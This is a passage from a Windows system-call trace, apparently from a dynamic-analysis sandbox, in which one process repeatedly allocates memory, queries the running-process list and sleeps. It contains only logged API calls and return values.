BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.307] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.316] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.316] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.323] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.328] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.332] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.336] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.336] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.353] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.353] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.360] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.369] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.385] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.386] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.390] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.481] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.481] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.485] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.559] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.589] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.606] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.621] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.625] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.626] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.698] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.703] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.704] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.779] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.789] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.823] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.830] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.838] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.842] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.846] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.847] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x550000, RegionSize=0xdea68*=0x10000) returned 0x0 [0151.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x550000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x550000, ResultLength=0x0) returned 0xc0000004 [0151.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x550000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0151.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x860000, RegionSize=0xdea54*=0x20000) returned 0x0 [0151.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x860000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x860000, ResultLength=0x0) returned 0x0 [0151.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x860000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0151.859] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0151.868] NtAllocateVirtualMemory (in: 